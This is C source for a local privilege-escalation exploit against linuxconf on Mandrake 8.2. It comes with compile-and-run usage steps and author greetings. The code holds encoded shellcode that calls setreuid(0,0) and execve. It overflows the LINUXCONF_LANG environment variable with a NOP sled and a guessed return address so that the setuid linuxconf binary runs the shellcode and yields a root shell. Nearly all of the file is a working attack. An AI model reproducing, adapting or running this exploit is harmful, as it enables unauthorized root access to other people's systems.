Mandrake 8.2 linuxconf local root exploit.
10ac292ecd095adfff7090099b436f9adcb2b98fee0c74a8249eeff765272b78
/*
linuxconf mandrake 8.2
by pokleyzz (pokleyzz@scan-associates.net)
** for my comfimation **
greet : *(sk + wanvadder + Skywizard + The_Gigco + scan clan (if exist) + #mylinux + #mybsd)
usage :
$ gcc elinuxconf.c -o elinuxconf
$ mkdir linuxconf.eng
$ touch linuxconf.eng/linuxconf.eng
$ ./elinuxconf
# reboot
http://www.scan-associates.net
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <malloc.h>
#define LINUXCONF "/bin/linuxconf"
#define BUFFSIZE 2050
#define OFFSET 0x1111
// pointer to some string
#define DUMMY 0x0811708d
char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";
long get_sp ()
{
__asm__("movl %esp,%eax");
}
int main (int argc, char **argv)
{
char *buff;
int i , ret;
buff = (char *)malloc(BUFFSIZE);
ret = get_sp() - OFFSET;
for (i = 0;i < 2048 ; i++)
buff[i] = 0x90;
memcpy((char*)(buff + 1600),shellcode,strlen(shellcode));
for (i = 0; i < 108 ; i+=4)
*(char **)&buff[1940 +i] = DUMMY;
*(char **)&buff[1976] = ret;
buff[2049] = 0x00;
setenv("LINUXCONF_LANG",buff,1);
execl(LINUXCONF, "linuxconf", 0);
return 0;
}